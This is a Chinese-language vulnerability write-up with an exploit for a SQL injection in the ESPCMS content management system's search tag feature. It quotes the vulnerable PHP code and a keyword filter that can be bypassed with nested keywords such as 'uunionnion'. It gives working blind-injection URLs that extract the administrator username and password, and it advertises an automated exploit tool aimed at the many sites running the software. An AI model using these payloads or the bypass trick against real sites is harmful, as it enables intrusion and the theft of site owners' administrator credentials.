漏洞:Espcms 通殺 SQL注入漏洞分析附EXP
漏洞作者:Seay
博客:www.cnseay.com
官網介紹:
易思ESPCMS企業網站管理系統基於LAMP開發構建的企業網站管理系統,它具有操作簡單、功能強大、穩定性好、擴展性及安全性強、二次開發及後期維護方便,可以幫您迅速、輕鬆地構建起一個強大專業的企業網站。
![]()
收錄85W
漏洞在interface/search.php文件和interface/3gwap_search.php文件in_taglist()函數都存在,一樣的問題,以
interface/search.php爲例說明:
function in_taglist() {
parent::start_pagetemplate();
include_once admin_ROOT . 'public/class_pagebotton.php';
$page = $this->fun->accept('page', 'G');
$page = isset($page) ? intval($page) : 1;
$lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
$tagkey = urldecode($this->fun->accept('tagkey', 'R'));
$tagkey = $this->fun->inputcodetrim($tagkey);
$db_where = ' WHERE lng=\'' . $lng . '\' AND isclass=1';
if (empty($tagkey)) {
$linkURL = $_SERVER['HTTP_REFERER'];
$this->callmessage($this->lng['search_err'], $linkURL, $this->lng['gobackbotton']);
}
if (!empty($tagkey)) {
$db_where.=" AND FIND_IN_SET('$tagkey',tags)";
}
$pagemax = 20;
$pagesylte = 1;
$templatesDIR = $this->get_templatesdir('article');
$templatefilename = $lng . '/' . $templatesDIR . '/search';
$db_table = db_prefix . 'document';
$countnum = $this->db_numrows($db_table, $db_where);
if ($countnum > 0) {
$numpage = ceil($countnum / $pagemax);
} else {
$numpage = 1;
}
$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,
color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
$this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], $this->CON['is_rewrite']);
$sql = $this->htmlpage->PageSQL('pid,did', 'down');
$rs = $this->db->query($sql);
while ($rsList = $this->db->fetch_assoc($rs)) {
由於$tagkey變量使用了urldecode,從而可以繞過GPC,最終
$db_where.=” AND FIND_IN_SET(‘$tagkey’,tags)”;
$tagkey被帶入SQL語句。
可以看到下面有
$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
也被帶入數據庫查詢,兩條語句可以注入,可以看到第二條SQL語句是可以查詢出數據的。但是由於espcms默認配置是不顯示SQL語句錯誤的,而第一條SQL語句查詢出來的是count(*),即int,
更蛋疼的是隻要第一條查詢報錯,第二條就不會執行。所以只有用第一條盲注來搞了。
漏洞測試EXP:http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=a%2527
由於espcms本身有防注入函數,在文件
public\class_function.phpinputcodetrim()函數。
function inputcodetrim($str) {
if (empty($str)) return $str;
$str = str_replace("&", "&", $str);
$str = str_replace(">", ">", $str);
$str = str_replace("<", "<", $str);
$str = str_replace("<", "<", $str);
$str = str_ireplace("select", "", $str);
$str = str_ireplace("join", "", $str);
$str = str_ireplace("union", "", $str);
$str = str_ireplace("where", "", $str);
$str = str_ireplace("insert", "", $str);
$str = str_ireplace("delete", "", $str);
$str = str_ireplace("update", "", $str);
$str = str_ireplace("like", "", $str);
$str = str_ireplace("drop", "", $str);
$str = str_ireplace("create", "", $str);
$str = str_ireplace("modify", "", $str);
$str = str_ireplace("rename", "", $str);
$str = str_ireplace("count", "", $str);
$str = str_ireplace("from", "", $str);
$str = str_ireplace("group by", "", $str);
$str = str_ireplace("concat", "", $str);
$str = str_ireplace("alter", "", $str);
$str = str_ireplace("cas", "cast", $str);
$str = preg_replace("/<span[^>]+>/i", "<span>", $str);
$str = preg_replace("/<p[^>]+>/i", "<p>", $str);
$str = preg_replace("/<font[^>]+>/i", "<font>", $str);
$str = preg_replace("/width=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
$str = preg_replace("/height=(\'|\")?[\d%]+(\'|\")?/i", "", $str);
$str = preg_replace("'<style[^\f]*?(\/style>)'si", "", $str);
return $str;
}
只是把關鍵字替換爲空,例如union可uunionnion繞過本身防注入,還可以無視不攔截單引號的waf。
猜解用戶名長度
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 1=(seselectlect length(username) frfromom espcms_admin_member limit 1) limit 1– by seay
爆破用戶名和密碼:
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by seay
寫了個Exp,下載地址
使用方法:espcms_exp_by_Seay.exewww.cnseay.com
即可自動爆出表前綴、用戶名、跟密碼。
最終上個官網的圖:
![]()
